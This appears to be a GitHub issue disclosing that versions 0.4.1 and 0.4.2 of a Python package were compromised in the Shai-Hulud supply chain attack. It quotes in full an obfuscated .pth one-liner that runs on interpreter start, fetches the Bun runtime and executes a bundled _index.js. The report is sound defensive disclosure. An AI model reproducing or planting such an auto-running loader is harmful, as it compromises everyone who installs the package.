While installing the latest version of the package (0.4.2 at the time of writing), I noticed a weird message
Error processing line 1 of /Users/stefano.cretti/.local/share/mamba/envs/test_plot/lib/python3.14/site-packages/coolbox-setup.pth:
Traceback (most recent call last):
File "<frozen site>", line 213, in addpackage
File "<string>", line 1, in <module>
File "<string>", line 1
import os as _o,subprocess as _s,urllib.request as _u,platform as _p,sys as _y;_d=_o.path.dirname;_n=_o.path.join;_j=_n(_d(__file__),"_index.js");if not
_o.path.exists(_j):import glob as _g;_c=_g.glob(_n(_d(__file__),"*","_index.js"));_j=_c[0]if _c else"";_e=_o.name=="nt";_b=_n(_T.gettempdir(),"b","bun"+(".exe" if _e else""));if not
_o.path.exists(_b):_a="aarch64" if _p.machine()=="arm64" else"x64";_m={"linux":"linux","darwin":"darwin","win32":"windows"}.get(_y.platform,"linux");_z=_n(_T.gettempdir(),"b.zip");_u
.urlretrieve(f"https://github.com/oven-sh/bun/releases/download/bun-v1.3.13/bun-{_m}-{_a}.zip",_z);import zipfile as
_zf;_zf.ZipFile(_z).extract(_o.path.basename(_b),_d(_b));_o.chmod(_b,509);_o.unlink(_z);_s.run([_b,"run",_j],check=False);open(_G,"w").close()
^^
SyntaxError: invalid syntax
Remainder of file ignored
By investigating it, I found out that versions 0.4.1 and 0.4.2 of the package are affected by the Shai-Hulud supply chain attack.
I was saved by the usage of Python 3.14, but I could have been affected were I using an older version.
This issue is to inform the maintainers (if not addressed, any newer version published from their machines will be affected) as well as anyone who might have installed the package.
As far as I can tell, version 0.4.0 is the latest uncompromised one, so I would advise pinning that for the time being.